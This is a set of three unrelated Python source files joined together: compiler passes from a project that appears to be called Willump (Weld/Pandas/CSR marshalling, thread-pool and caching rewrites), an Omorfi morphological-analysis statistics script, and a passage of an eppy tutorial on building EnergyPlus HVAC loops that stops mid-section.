        if isinstance(output_type, WeldPandas):
            # Rebuild a DataFrame from the struct-of-columns the Weld block produced:
            # "x = pd.DataFrame({'col': x[i], ...})".
            df_creation_arguments = ""
            for i, column_name in enumerate(output_type.column_names):
                df_creation_arguments += "'%s' : %s[%d]," % (column_name, stripped_output_name, i)
            df_creation_statement = "%s = pd.DataFrame({%s})" % (stripped_output_name, df_creation_arguments)
            df_creation_ast: ast.Module = \
                ast.parse(df_creation_statement, "exec")
            df_creation_node = WillumpPythonNode(python_ast=df_creation_ast.body[0], input_names=[],
                                                 output_names=[output_name], output_types=[], in_nodes=[])
            pandas_post_processing_nodes.append(df_creation_node)
    return pandas_input_processing_nodes, pandas_post_processing_nodes
def weld_pandas_series_marshalling_pass(weld_block_input_set: Set[str], weld_block_output_set: Set[str],
                                        typing_map: Mapping[str, WeldType]) \
        -> Tuple[List[WillumpPythonNode], List[WillumpPythonNode]]:
    """
    Processing pass creating Python code to marshall Pandas Series inputs into a representation
    (numpy array, via .values) Weld can understand.  Outputs are currently left untouched.

    # TODO: Also convert back to Pandas series.
    """
    preprocessing_nodes: List[WillumpPythonNode] = []
    postprocessing_nodes: List[WillumpPythonNode] = []
    series_inputs = (name for name in weld_block_input_set
                     if isinstance(typing_map[name], WeldSeriesPandas))
    for series_name in series_inputs:
        # Drop the line-number suffix to recover the Python-level variable name.
        bare_name = strip_linenos_from_var(series_name)
        conversion_source = "%s = %s.values" % (bare_name, bare_name)
        conversion_module: ast.Module = ast.parse(conversion_source, "exec")
        conversion_node = WillumpPythonNode(python_ast=conversion_module.body[0], input_names=[],
                                            output_names=[series_name], output_types=[], in_nodes=[])
        preprocessing_nodes.append(conversion_node)
    return preprocessing_nodes, postprocessing_nodes
def weld_csr_marshalling_pass(weld_block_input_set: Set[str], weld_block_output_set: Set[str],
                              typing_map: Mapping[str, WeldType]) \
        -> Tuple[List[WillumpPythonNode], List[WillumpPythonNode]]:
    """
    Processing pass creating Python code to marshall CSR-format sparse matrices between Weld and
    Python: inputs are converted with csr_marshall() before the Weld block (and restored after),
    and CSR outputs of the block are rebuilt as scipy.sparse.csr_matrix objects.

    Returns (input_processing_nodes, post_processing_nodes).
    """
    csr_input_processing_nodes: List[WillumpPythonNode] = []
    csr_post_processing_nodes: List[WillumpPythonNode] = []
    for input_name in weld_block_input_set:
        input_type = typing_map[input_name]
        stripped_input_name = strip_linenos_from_var(input_name)
        store_weld_form_name = "weld_csr_" + stripped_input_name
        temp_name = "temp_" + stripped_input_name
        if isinstance(input_type, WeldCSR):
            # Generated code: "x, temp_x = csr_marshall(x), x" -- convert x for Weld while
            # saving the original object in temp_x for restoration afterwards.
            # NOTE(review): the template uses placeholders {0} and {2} only; {1}
            # (store_weld_form_name) is never referenced here -- looks like dead code, confirm.
            csr_marshall = """{0}, {2} = csr_marshall({0}), {0}\n""".format(
                stripped_input_name, store_weld_form_name, temp_name)
            csr_creation_ast: ast.Module = \
                ast.parse(csr_marshall, "exec")
            csr_creation_node = WillumpPythonNode(python_ast=csr_creation_ast.body[0], input_names=[],
                                                  output_names=[], output_types=[], in_nodes=[])
            csr_input_processing_nodes.append(csr_creation_node)
            # Post-block restoration: "x = temp_x".
            # NOTE(review): "car_unmarshaller" appears to be a typo for "csr_unmarshaller";
            # harmless (local name only) but worth renaming in a behavior-change-free commit.
            car_unmarshaller = """{0} = {1}\n""".format(stripped_input_name, temp_name)
            csr_unmarshaller_ast: ast.Module = \
                ast.parse(car_unmarshaller, "exec")
            csr_unmarshaller_node = WillumpPythonNode(python_ast=csr_unmarshaller_ast.body[0], input_names=[],
                                                      output_names=[], output_types=[], in_nodes=[])
            csr_post_processing_nodes.append(csr_unmarshaller_node)
    for output_name in weld_block_output_set:
        output_type = typing_map[output_name]
        stripped_output_name = strip_linenos_from_var(output_name)
        store_weld_form_name = "weld_csr_" + stripped_output_name
        if isinstance(output_type, WeldCSR):
            # Rebuild a scipy CSR matrix from the Weld 5-tuple (rows, cols, data, n_rows, n_cols),
            # keeping the raw Weld-form tuple around in weld_csr_<name>.
            csr_marshall = """{0}, {1} = scipy.sparse.csr_matrix(({0}[2], ({0}[0], {0}[1])), shape=({0}[3], {0}[4])), {0}\n""".format(
                stripped_output_name, store_weld_form_name)
            csr_creation_ast: ast.Module = \
                ast.parse(csr_marshall, "exec")
            csr_creation_node = WillumpPythonNode(python_ast=csr_creation_ast.body[0], input_names=[],
                                                  output_names=[output_name], output_types=[], in_nodes=[])
            csr_post_processing_nodes.append(csr_creation_node)
    return csr_input_processing_nodes, csr_post_processing_nodes
def multithreading_weld_blocks_pass(weld_block_node_list: List[WillumpGraphNode],
                                    weld_block_input_set: Set[str],
                                    weld_block_output_set: Set[str],
                                    num_threads: int) \
        -> List[typing.Union[Tuple[List[WillumpGraphNode], Set[str], Set[str]],
                             Tuple[Set[str], List[Tuple[List[WillumpGraphNode], Set[str]]]]]]:
    """
    Identify opportunities for multithreading in the node list and parallelize them. Return a list of sequential
    Weld blocks (Tuples of node lists, inputs, and outputs) or parallel node blocks (inputs, then a list of tuples
    of node lists and outputs).

    TODO: Only parallelizes node blocks ending in a StackSparseNode.
    TODO: Assumes subgraphs rooted in inputs to a StackSparseNode and in weld_block_node_list are disjoint.
    """
    combine_node = weld_block_node_list[-1]
    if not isinstance(combine_node, StackSparseNode):
        # Not a parallelizable shape: return the whole block as one sequential entry.
        return [(weld_block_node_list, weld_block_input_set, weld_block_output_set)]
    input_nodes = combine_node.get_in_nodes()
    # One (nodes, outputs) job per input subgraph of the combining stack node.
    thread_list: List[Tuple[List[WillumpGraphNode], Set[str]]] = []
    for model_input_node in input_nodes:
        # The graph below model_input_node, topologically sorted.
        sorted_nodes: List[WillumpGraphNode] = topological_sort_graph(WillumpGraph(model_input_node))
        # Only the nodes from that graph which are in our block.
        sorted_nodes = list(filter(lambda x: x in weld_block_node_list, sorted_nodes))
        output_set: Set[str] = set()
        for node in sorted_nodes:
            output_name = node.get_output_name()
            # A job must expose block-level outputs plus its own root's output (fed to the stack).
            if output_name in weld_block_output_set or node is model_input_node:
                output_set.add(output_name)
        thread_list.append((sorted_nodes, output_set))
    # Coalesce if more jobs than threads.
    if len(thread_list) > num_threads:
        thread_list_length = len(thread_list)  # To avoid Python weirdness.
        thread_list_index = 0
        while thread_list_length > num_threads:
            assert (thread_list_index < thread_list_length)
            # Merge the job at thread_list_index with its (circular) successor.
            graph_nodes_one, outputs_one = thread_list[thread_list_index]
            graph_nodes_two, outputs_two = thread_list[(thread_list_index + 1) % thread_list_length]
            graph_nodes_comb = graph_nodes_one + graph_nodes_two
            outputs_comb = outputs_one.union(outputs_two)
            new_entry: List[Tuple[List[WillumpGraphNode], Set[str]]] = [(graph_nodes_comb, outputs_comb)]
            if (thread_list_index + 1) % thread_list_length != 0:
                # Normal case: successor is the next element -- splice the merged entry in place.
                thread_list = thread_list[0:thread_list_index] + new_entry + thread_list[thread_list_index + 2:]
            else:
                # Wrap-around case: merged last and first elements -- merged entry goes up front.
                thread_list = new_entry + thread_list[1:-1]
            thread_list_length -= 1
            thread_list_index = (thread_list_index + 1) % thread_list_length
    # One parallel entry (shared inputs, per-thread jobs) followed by the sequential combiner.
    parallel_entry: Tuple[Set[str], List[Tuple[List[WillumpGraphNode], Set[str]]]] = (weld_block_input_set, thread_list)
    combiner_input_names = set(combine_node.get_in_names())
    combiner_output_name = {combine_node.get_output_name()}
    sequential_entry: Tuple[List[WillumpGraphNode], Set[str], Set[str]] = ([combine_node],
                                                                           combiner_input_names, combiner_output_name)
    return [parallel_entry, sequential_entry]
def async_python_functions_parallel_pass(sorted_nodes: List[WillumpGraphNode]) \
        -> List[WillumpGraphNode]:
    """
    Run all asynchronous Python nodes in separate threads.

    For each async node "out = f(args)" inside a block of consecutive Python nodes, the call is
    rewritten to "out = EXECUTOR.submit(f, args)" and hoisted as early as dependencies allow,
    and a matching "out = out.result()" node is inserted as late as possible (just before the
    first consumer of out), maximizing the window in which the thread runs concurrently.
    Returns the (rebuilt) node list.
    """
    def find_pyblock_after_n(n: int) -> Optional[Tuple[int, int]]:
        # Find the next run [start, end) of consecutive Python/input nodes after index n.
        # NOTE: reads the enclosing sorted_nodes, which the loop below rebinds each iteration.
        start_index = None
        end_index = None
        for i, statement in enumerate(sorted_nodes):
            if i > n and isinstance(statement, WillumpPythonNode) \
                    and not isinstance(statement, CascadePointEarlyExitNode):
                start_index = i
                break
        if start_index is None:
            return None
        for i, statement in enumerate(sorted_nodes):
            if i > start_index and ((not isinstance(statement, WillumpPythonNode)
                                     and not isinstance(statement, WillumpInputNode))\
                    or isinstance(statement, CascadePointEarlyExitNode)):
                end_index = i
                break
        if end_index is None:
            end_index = len(sorted_nodes)
        return start_index, end_index
    pyblock_start_end = find_pyblock_after_n(-1)
    while pyblock_start_end is not None:
        pyblock_start, pyblock_end = pyblock_start_end
        assert(pyblock_start < pyblock_end)
        pyblock: List[WillumpPythonNode] = sorted_nodes[pyblock_start:pyblock_end]
        # Collect the async nodes in this Python block.
        async_nodes = []
        for node in pyblock:
            if isinstance(node, WillumpPythonNode) and node.is_async_node:
                async_nodes.append(node)
        for async_node in async_nodes:
            assert (len(async_node.get_output_names()) == 1)
            async_node_output_name: str = async_node.get_output_names()[0]
            async_node_index = pyblock.index(async_node)
            input_names: List[str] = async_node.get_in_names()
            # Earliest position the submit may move to: just after the last producer of its inputs.
            first_legal_index: int = async_node_index
            for j in range(async_node_index - 1, 0 - 1, -1):
                if any(output_name in input_names for output_name in pyblock[j].get_output_names()):
                    break
                else:
                    first_legal_index = j
            pyblock.remove(async_node)
            async_node_ast: ast.Assign = async_node.get_python()
            assert (isinstance(async_node_ast.value, ast.Call))
            assert (isinstance(async_node_ast.value.func, ast.Name))
            # output = executor.submit(original func names, original func args...)
            new_call = ast.Call()
            new_call.keywords = []
            new_call.func = ast.Attribute()
            new_call.func.attr = "submit"
            new_call.func.ctx = ast.Load()
            new_call.func.value = ast.Name()
            new_call.func.value.id = WILLUMP_THREAD_POOL_EXECUTOR
            new_call.func.value.ctx = ast.Load()
            # The original callee becomes submit's first argument, followed by its own args.
            new_args = async_node_ast.value.args
            new_first_arg = ast.Name()
            new_first_arg.id = async_node_ast.value.func.id
            new_first_arg.ctx = ast.Load()
            new_args.insert(0, new_first_arg)
            new_call.args = new_args
            async_node_ast.value = new_call
            executor_async_node = WillumpPythonNode(python_ast=async_node_ast, input_names=async_node.get_in_names(),
                                                    output_names=async_node.get_output_names(),
                                                    output_types=async_node.get_output_types(),
                                                    in_nodes=async_node.get_in_nodes())
            pyblock.insert(first_legal_index, executor_async_node)
            # Latest position for the .result() node: just before the first consumer of the output.
            last_legal_index = first_legal_index + 1
            for j in range(first_legal_index + 1, len(pyblock)):
                curr_node = pyblock[j]
                node_inputs = curr_node.get_in_names()
                if async_node_output_name in node_inputs:
                    break
                else:
                    last_legal_index = j
            # Generated code: "out = out.result()" -- blocks until the future completes.
            result_python = "%s = %s.result()" % (strip_linenos_from_var(async_node_output_name),
                                                  strip_linenos_from_var(async_node_output_name))
            result_ast: ast.Module = \
                ast.parse(result_python, "exec")
            pandas_input_node = WillumpPythonNode(python_ast=result_ast.body[0],
                                                  input_names=[async_node_output_name],
                                                  output_names=async_node.get_output_names(),
                                                  output_types=async_node.get_output_types(),
                                                  in_nodes=[executor_async_node])
            pyblock.insert(last_legal_index, pandas_input_node)
        # Splice the rewritten block back in, then continue after it.
        sorted_nodes = sorted_nodes[:pyblock_start] + pyblock + sorted_nodes[pyblock_end:]
        pyblock_start_end = find_pyblock_after_n(pyblock_end)
    return sorted_nodes
def cache_python_block_pass(sorted_nodes: List[WillumpGraphNode], willump_cache_dict: dict,
                            max_cache_size: Optional[int]) -> List[WillumpGraphNode]:
    """
    Detect cacheable functions and cache them by replacing calls to them with calls to the
    caching function:  "y = f(a, b)"  becomes  "y = willump_cache(f, (a,b), CACHE, node_num)".

    Only simple calls (all positional args are plain names, single name target) are rewritten.
    Also initializes willump_cache_dict with one OrderedDict cache per rewritten node, splitting
    max_cache_size evenly among them (unbounded when max_cache_size is None).
    """
    node_num = 0  # Index of the next rewritten node; doubles as its cache id.
    for i, entry in enumerate(sorted_nodes):
        if isinstance(entry, WillumpPythonNode) and entry.is_cached_node:
            entry_ast: ast.Assign = entry.get_python()
            assert (isinstance(entry_ast, ast.Assign))
            value = entry_ast.value
            assert (isinstance(value, ast.Call))
            assert (isinstance(value.func, ast.Name))
            assert (len(entry_ast.targets) == 1)
            # Only rewrite "name = func(name1, name2, ...)" -- anything fancier is left alone.
            if all(isinstance(arg_entry, ast.Name) for arg_entry in value.args) \
                    and isinstance(entry_ast.targets[0], ast.Name):
                target_name = entry_ast.targets[0].id
                func_name = value.func.id
                arg_string = ""
                for arg in value.args:
                    arg_string += "%s," % arg.id
                cache_python = \
                    """%s = willump_cache(%s, (%s), %s, %d)""" % \
                    (target_name, func_name, arg_string, WILLUMP_CACHE_NAME, node_num)
                cache_ast: ast.Module = ast.parse(cache_python, "exec")
                cache_node = WillumpPythonNode(python_ast=cache_ast.body[0], input_names=entry.get_in_names(),
                                               output_names=entry.get_output_names(),
                                               output_types=entry.get_output_types(),
                                               in_nodes=entry.get_in_nodes(),
                                               is_async_node=entry.is_async_node)
                sorted_nodes[i] = cache_node
                node_num += 1
    # Initialize all caches.
    if max_cache_size is None:
        max_cache_size = math.inf
    num_cached_nodes = node_num
    cache_dict_caches = {}
    cache_dict_max_lens = {}
    for i in range(num_cached_nodes):
        cache_dict_caches[i] = OrderedDict()
        # Split the total budget evenly; note this is float division (inf stays inf).
        cache_dict_max_lens[i] = max_cache_size / num_cached_nodes
    willump_cache_dict[WILLUMP_CACHE_NAME] = cache_dict_caches
    willump_cache_dict[WILLUMP_CACHE_MAX_LEN_NAME] = cache_dict_max_lens
    willump_cache_dict[WILLUMP_CACHE_ITER_NUMBER] = 0
    return sorted_nodes
|
<filename>omorfi/omorfi_parse.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import codecs
import locale
import re
import sys
import gzip
from collections import defaultdict
excluded_fields = ["BLACKLIST", "WORD_ID"]
MAX_NUM_ANALYSES_PER_WORD = 15
TAG_SEPARATOR = ","
def _read_analyses_file(analysisFname, analyses, shortenLongNumberAnalysis=True, encoding="utf8"):
    """
    Parse one Omorfi analyzer output file into *analyses*.

    Each input line is "word<TAB>[FIELD=val][FIELD=val]...".  For every line, the bracketed
    fields (minus the blacklisted ones in `excluded_fields`) are joined with TAG_SEPARATOR and
    appended to analyses[word.lower()] if not already present.  Reading stops at the
    "Strings<TAB>Found" summary line.  Transparently supports gzip-compressed (.gz) files.

    :param analysisFname: Path to the analyzer output (optionally .gz).
    :param analyses: dict word -> list of analysis strings, updated in place.
    :param shortenLongNumberAnalysis: For numbers (UPOS=NUM), keep only the tags after the
        last BOUNDARY=COMPOUND tag.
    :param encoding: Text encoding of the file.
    :raises Exception: On a line that does not have exactly two tab-separated fields.
    :return: The (mutated) analyses dict.
    """
    if analysisFname.endswith(".gz"):
        analysisFile = gzip.open(analysisFname, "rt", encoding=encoding)
    else:
        analysisFile = codecs.open(analysisFname, encoding=encoding)
    # Bug fix: the file handle was previously never closed; the with-block guarantees it.
    with analysisFile:
        for line in analysisFile:
            line = line.strip()
            if not len(line):
                continue
            if line.startswith("Strings\tFound"):
                break
            tokens = line.split("\t")
            if len(tokens) != 2:
                raise Exception("Erroneous Omorfi analysis: %s" % line)
            word = tokens[0].lower()
            if word not in analyses:
                analyses[word] = list()
            # Raw string for the regex (avoids the "\[" invalid-escape warning).
            analysis_tokens = re.findall(r"\[(.*?)\]", tokens[1])
            if analysis_tokens:
                analysis_tokens = list(filter(lambda x: x.split("=")[0] not in excluded_fields, analysis_tokens))
                # In this case, keep only the analysis tags after the last BOUNDARY=COMPOUND tag.
                # Bug fix: re-check non-emptiness -- the blacklist filter above may have removed
                # every token, in which case analysis_tokens[0] used to raise IndexError.
                if shortenLongNumberAnalysis and analysis_tokens and "UPOS=NUM" in analysis_tokens[0]:
                    compound_sep_poss = [i for i, x in enumerate(analysis_tokens) if x == "BOUNDARY=COMPOUND"]
                    if len(compound_sep_poss):
                        analysis_tokens = analysis_tokens[compound_sep_poss[-1]+1:]
                word_analysis = TAG_SEPARATOR.join(analysis_tokens)
                if len(word_analysis) and word_analysis not in analyses[word]:
                    analyses[word].append(word_analysis)
    return analyses
def _merge_large_coverage_analyses(analyses, large_coverage_analyses):
    """
    Overwrite entries of *analyses* (default vocabulary) with their extended-vocabulary
    counterparts when the extended analysis is usable: it must not exceed
    MAX_NUM_ANALYSES_PER_WORD analyses, and either the word had no default analysis at all,
    or (for non-numbers) the extended list is strictly longer.

    Returns (extra_words, extra_analyses): how many words gained a first analysis and how many
    words had their analysis list grow.
    """
    new_word_count = 0
    grown_word_count = 0
    for word, default_analyses in analyses.items():
        extended_analyses = large_coverage_analyses[word]
        if len(extended_analyses) > MAX_NUM_ANALYSES_PER_WORD:
            # Too ambiguous in the extended vocabulary; keep the default analyses.
            continue
        looks_numeric = any("UPOS=NUM" in analysis for analysis in extended_analyses)
        if not default_analyses and extended_analyses:
            new_word_count += 1
            analyses[word] = extended_analyses
        elif not looks_numeric and len(extended_analyses) > len(default_analyses):
            grown_word_count += 1
            analyses[word] = extended_analyses
    return new_word_count, grown_word_count
def read_analyses(analysisFname, largeCoverageAnalysisFname, shortenLongNumberAnalysis=True, verbose=True):
    """
    Read the default-vocabulary and extended-vocabulary Omorfi analysis files and merge them,
    preferring extended analyses where they add information.

    :raises Exception: If the two files do not yield the same number of words.
    :return: dict word -> list of analysis strings.
    """
    def log(message):
        # All progress messages go to stderr so stdout stays clean for data.
        if verbose:
            print(message, file=sys.stderr)

    analyses = dict()
    log("Reading default vocabulary Omorfi analyses..")
    _read_analyses_file(analysisFname, analyses, shortenLongNumberAnalysis)
    large_coverage_analyses = dict()
    log("Reading extended vocabulary Omorfi analyses..")
    _read_analyses_file(largeCoverageAnalysisFname, large_coverage_analyses, shortenLongNumberAnalysis)
    if len(analyses) != len(large_coverage_analyses):
        raise Exception("number of analyses don't match, (%i and %i)" % (len(analyses), len(large_coverage_analyses)))
    log("Merging analysis outputs..")
    extra_words, extra_analyses = _merge_large_coverage_analyses(analyses, large_coverage_analyses)
    log("Number of new words with analyses in the extended vocabulary: %i" % extra_words)
    log("Number of words with more analyses in the extended vocabulary: %i" % extra_analyses)
    if verbose:
        print("")
    return analyses
def get_num_analyses_per_word(analyses):
    """
    Build a histogram of analysis-list lengths: maps "number of analyses" to "number of words
    having exactly that many analyses".  Words with no analyses are excluded.
    """
    histogram = defaultdict(int)
    for word_analyses in analyses.values():
        if word_analyses:
            histogram[len(word_analyses)] += 1
    return histogram
def get_analysis_classes(analyses):
    """
    Count the occurrences of each distinct analysis string across all words: maps analysis
    string to the number of words carrying it.
    """
    class_counts = defaultdict(int)
    for word_analyses in analyses.values():
        if not word_analyses:
            continue
        for analysis in word_analyses:
            class_counts[analysis] += 1
    return class_counts
if __name__ == "__main__":
    # Command-line entry point: read the two Omorfi analysis files and print summary
    # statistics about the merged analyses to stderr.
    parser = argparse.ArgumentParser(description="Prints statistics about the Omorfi analyses")
    parser.add_argument("ANALYSES", help="Output from the Omorfi analyzer without the -X switch.")
    parser.add_argument("LARGE_COVERAGE_ANALYSES", help="Output from the Omorfi analyzer with the -X switch.")
    args = parser.parse_args()
    # NOTE(review): requires the en_US.utf8 locale to be installed; setlocale raises otherwise.
    locale.setlocale(locale.LC_ALL, 'en_US.utf8')
    analyses = read_analyses(args.ANALYSES, args.LARGE_COVERAGE_ANALYSES, True, True)
    num_w_analyses = len([x for x in analyses.values() if len(x)])
    # For each word, flag per analysis whether it is a proper noun (UPOS=PROPN).  The
    # "uppercase"/"lowercase" statistics below treat PROPN as uppercase.
    case_info = dict()
    for word, word_analyses in analyses.items():
        case_info[word] = list(map(lambda x: "UPOS=PROPN" in x, list(word_analyses)))
    num_uc = len([x for x in case_info.values() if x.count(True) > 0])
    num_lc = len([x for x in case_info.values() if x.count(False) > 0])
    num_both = len([x for x in case_info.values() if x.count(False) > 0 and x.count(True) > 0])
    print("Number of words: %i" % len(analyses), file=sys.stderr)
    print("Words with analysis: %i" % num_w_analyses, file=sys.stderr)
    print("Words with uppercase analysis: %i" % num_uc, file=sys.stderr)
    print("Words with lowercase analysis: %i" % num_lc, file=sys.stderr)
    print("Words with both upper and lowercase analysis: %i" % num_both, file=sys.stderr)
    print("", file=sys.stderr)
    # Histogram: how many words have exactly N analyses.
    counts = get_num_analyses_per_word(analyses)
    for analysis_count in sorted(counts):
        print("Words with %i analyses: %i" % (analysis_count, counts[analysis_count]), file=sys.stderr)
    print("", file=sys.stderr)
    analysis_types = get_analysis_classes(analyses)
    print("Distinct morphological classes: %i" % len(analysis_types), file=sys.stderr)
    # for analysis_type, count in analysis_types.items():
    #    print("")
    #    print("%s\t%i" % (analysis_type, count))
|
<filename>docs/HVAC_Tutorial.py
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <headingcell level=1>
# HVAC Loops
# <headingcell level=2>
# Conceptual Introduction to HVAC Loops
# <markdowncell>
# Eppy builds three kinds of loops for the energyplus idf file:
#
# 1. Plant Loops
# 2. Condensor Loops
# 3. Air Loops
#
# All loops have two halves:
#
# 1. Supply side
# 2. Demand Side
#
# The supply side provides the energy to the demand side that needs the energy. So the end-nodes on the supply side connect to the end-nodes on the demand side.
#
# The loop is made up of branches connected to each other. A single branch can lead to multiple branches through a **splitter** component. Multiple branches can lead to a single branch through a **mixer** component.
#
# Each branch is made up of components connected in series (in a line)
#
# Eppy starts off by building the shape or topology of the loop by connecting the branches in the right order. The branches themselves have a single component in them, that is just a place holder. Usually it is a pipe component. In an air loop it would be a duct component.
#
# The shape of the loop for the supply or demand side is quite simple.
#
# It can be described in the following manner for the supply side
#
# - The supply side starts single branch leads to a splitter
# - The splitter leads to multiple branches
# - these multiple branches come back and join in a mixer
# - the mixer leads to a single branch that becomes the end of the supply side
#
# For the demand side we have:
#
# - The demand side starts single branch leads to a splitter
# - The splitter leads to multiple branches
# - these multiple branches come back and join in a mixer
# - the mixer leads to a single branch that becomes end of the demand side
#
# The two ends of the supply side connect to the two ends of the demand side.
# <markdowncell>
# Diagrammatically, the two sides of the loop will look like this::
# <rawcell>
# Supply Side:
# ------------
# -> branch1 ->
# start_branch --> branch2 --> end_branch
# -> branch3 ->
# Demand Side:
# ------------
#
# -> d_branch1 ->
# d_start_branch --> d_branch2 --> d_end_branch
# -> d_branch3 ->
#
# <markdowncell>
#
# In eppy you could embody this in a list
# <codecell>
supplyside = ["start_brandh", ["branch1", "branch2", "branch3"], "end_branch"]
demandside = ["d_start_brandh", ["d_branch1", "d_branch2", "d_branch3"], "d_end_branch"]
# <markdowncell>
# Eppy will build the shape/topology of the loop using the two lists above. Each branch will have a placeholder component, like a pipe or a duct::
# <rawcell>
#
# branch1 = --duct--
# <markdowncell>
# Now we will have to replace the placeholder with the real components that make up the loop. For instance, branch1 should really have a pre-heat coil leading to a supply fan leading to a cooling coil leading to a heating coil::
# <rawcell>
#
# new_branch = pre-heatcoil -> supplyfan -> coolingcoil -> heatingcoil
# <markdowncell>
# Eppy lets you build a new branch and you can replace branch1 with new_branch
#
# In this manner we can build up the entire loop with the right components, once the initial topology is right
# <headingcell level=2>
# Building a Plant loop
# <markdowncell>
# Eppy can build up the topology of a plant loop using single pipes in a branch. Once we do that the simple branch in the loop we have built can be replaced with a more complex branch.
#
# Let us try this out and see how it works.
# <headingcell level=3>
# Building the topology of the loop
# <codecell>
# you would normally install eppy by doing
# python setup.py install
# or
# pip install eppy
# or
# easy_install eppy
# if you have not done so, uncomment the following three lines
import sys
# pathnameto_eppy = 'c:/eppy'
pathnameto_eppy = "../"
sys.path.append(pathnameto_eppy)
# <codecell>
from eppy.modeleditor import IDF
from eppy import hvacbuilder
from io import StringIO
iddfile = "../eppy/resources/iddfiles/Energy+V7_0_0_036.idd"
IDF.setiddname(iddfile)
# <codecell>
# make the topology of the loop
idf = IDF(StringIO("")) # makes an empty idf file in memory with no file name
loopname = "p_loop"
sloop = ["sb0", ["sb1", "sb2", "sb3"], "sb4"] # supply side of the loop
dloop = ["db0", ["db1", "db2", "db3"], "db4"] # demand side of the loop
hvacbuilder.makeplantloop(idf, loopname, sloop, dloop)
idf.saveas("hhh1.idf")
# <markdowncell>
# We have made plant loop and saved it as hhh1.idf.
# Now let us look at what the loop looks like.
# <headingcell level=3>
# Diagram of the loop
# <markdowncell>
# Let us use the script "eppy/useful_scripts/loopdiagrams.py" to draw this diagram
# <markdowncell>
# See [Generating a Loop Diagram](useful_scripts.html#loopdiagram-py) page for details on how to do this
# <markdowncell>
# Below is the diagram for this simple loop
#
# *Note: the supply and demand sides are not connected in the diagram, but shown separately for clarity*
# <codecell>
from eppy import ex_inits # no need to know this code, it just shows the image below
for_images = ex_inits
for_images.display_png(for_images.plantloop1) # display the image below
# <headingcell level=3>
# Modifying the topology of the loop
# <markdowncell>
# Let us make a new branch and replace the existing branch
#
# The existing branch name is "sb0" and it contains a single pipe component sb0_pipe.
#
# Let us replace it with a branch that has a chiller that is connected to a pipe which in turn is connected to another pipe. So the connections in the new branch would look like "chiller-> pipe1->pipe2"
# <codecell>
# make a new branch chiller->pipe1-> pipe2
# make a new pipe component
pipe1 = idf.newidfobject("PIPE:ADIABATIC", "np1")
# make a new chiller
chiller = idf.newidfobject("Chiller:Electric".upper(), "Central_Chiller")
# make another pipe component
pipe2 = idf.newidfobject("PIPE:ADIABATIC", "np2")
# get the loop we are trying to modify
loop = idf.getobject("PLANTLOOP", "p_loop") # args are (key, name)
# get the branch we are trying to modify
branch = idf.getobject("BRANCH", "sb0") # args are (key, name)
listofcomponents = [
chiller,
pipe1,
pipe2,
] # the new components are connected in this order
newbr = hvacbuilder.replacebranch(idf, loop, branch, listofcomponents, fluid="Water")
# in "loop"
# this replaces the components in "branch" with the components in "listofcomponents"
idf.saveas("hhh_new.idf")
# <markdowncell>
# We have saved this as file "hhh_new.idf".
# Let us draw the diagram of this file. (run this from eppy/eppy folder)
# <rawcell>
# python ex_loopdiagram.py hhh_new.idf
# <codecell>
from eppy import ex_inits # no need to know this code, it just shows the image below
for_images = ex_inits
for_images.display_png(for_images.plantloop2) # display the image below
# <markdowncell>
# This diagram shows the new components in the branch
# <headingcell level=3>
# Traversing the loop
# <markdowncell>
# It would be nice to move through the loop using functions "nextnode()" and "prevnode()"
#
# Eppy indeed has such functions
#
# Let us try to traverse the loop above.
# <codecell>
# to traverse the loop we are going to call some functions ex_loopdiagrams.py,
# the program that draws the loop diagrams.
from eppy import ex_loopdiagram
fname = "hhh_new.idf"
iddfile = "../eppy/resources/iddfiles/Energy+V8_0_0.idd"
edges = ex_loopdiagram.getedges(fname, iddfile)
# edges are the lines that draw the nodes in the loop.
# The term comes from graph theory in mathematics
# <markdowncell>
# The above code gets us the edges of the loop diagram. Once we have the edges, we can traverse through the diagram. Let us start with the "Central_Chiller" and work our way down.
# <codecell>
from eppy import walk_hvac
# walk the loop forwards, one component at a time, starting at the chiller
firstnode = "Central_Chiller"
nextnodes = walk_hvac.nextnode(edges, firstnode)
print(nextnodes)
# <codecell>
nextnodes = walk_hvac.nextnode(edges, nextnodes[0])
print(nextnodes)
# <codecell>
nextnodes = walk_hvac.nextnode(edges, nextnodes[0])
print(nextnodes)
# <codecell>
nextnodes = walk_hvac.nextnode(edges, nextnodes[0])
print(nextnodes)
# <markdowncell>
# This leads us to three components -> ['sb1_pipe', 'sb2_pipe', 'sb3_pipe']. Let us follow one of them
# <codecell>
nextnodes = walk_hvac.nextnode(edges, nextnodes[0])
print(nextnodes)
# <codecell>
nextnodes = walk_hvac.nextnode(edges, nextnodes[0])
print(nextnodes)
# <codecell>
nextnodes = walk_hvac.nextnode(edges, nextnodes[0])
print(nextnodes)
# <markdowncell>
# We have reached the end of this branch. There are no more components.
#
# We can follow this in reverse using the function prevnode()
# <codecell>
# walk the loop backwards from the last pipe using prevnode()
lastnode = "sb4_pipe"
prevnodes = walk_hvac.prevnode(edges, lastnode)
print(prevnodes)
# <codecell>
prevnodes = walk_hvac.prevnode(edges, prevnodes[0])
print(prevnodes)
# <codecell>
prevnodes = walk_hvac.prevnode(edges, prevnodes[0])
print(prevnodes)
# <codecell>
prevnodes = walk_hvac.prevnode(edges, prevnodes[0])
print(prevnodes)
# <codecell>
prevnodes = walk_hvac.prevnode(edges, prevnodes[0])
print(prevnodes)
# <codecell>
prevnodes = walk_hvac.prevnode(edges, prevnodes[0])
print(prevnodes)
# <codecell>
prevnodes = walk_hvac.prevnode(edges, prevnodes[0])
print(prevnodes)
# <markdowncell>
# All the way to where the loop ends
# <headingcell level=2>
# Building a Condenser loop
# <markdowncell>
# We build the condenser loop the same way we built the plant loop. Pipes are put in as placeholders for the components. Let us build a new idf file with just a condenser loop in it.
# <codecell>
# build a fresh idf containing only a condenser loop; pipes stand in for
# the real components, just as in the plant loop above
condensorloop_idf = IDF(StringIO(""))
loopname = "c_loop"
sloop = ["sb0", ["sb1", "sb2", "sb3"], "sb4"] # supply side
dloop = ["db0", ["db1", "db2", "db3"], "db4"] # demand side
theloop = hvacbuilder.makecondenserloop(condensorloop_idf, loopname, sloop, dloop)
condensorloop_idf.saveas("c_loop.idf")
# <markdowncell>
# Again, just as we did with the plant loop, we can change the components of the loop by replacing the branches, and traverse the loop using the functions nextnode() and prevnode()
# <headingcell level=2>
# Building an Air Loop
# <markdowncell>
# Building an air loop is similar to building the plant and condenser loops. The difference is that instead of pipes, we have ducts as placeholder components. The other difference is that we have zones on the demand side.
# <codecell>
# build a fresh idf containing only an air loop; ducts are the placeholder
# components here, and the demand side holds zones instead of branches
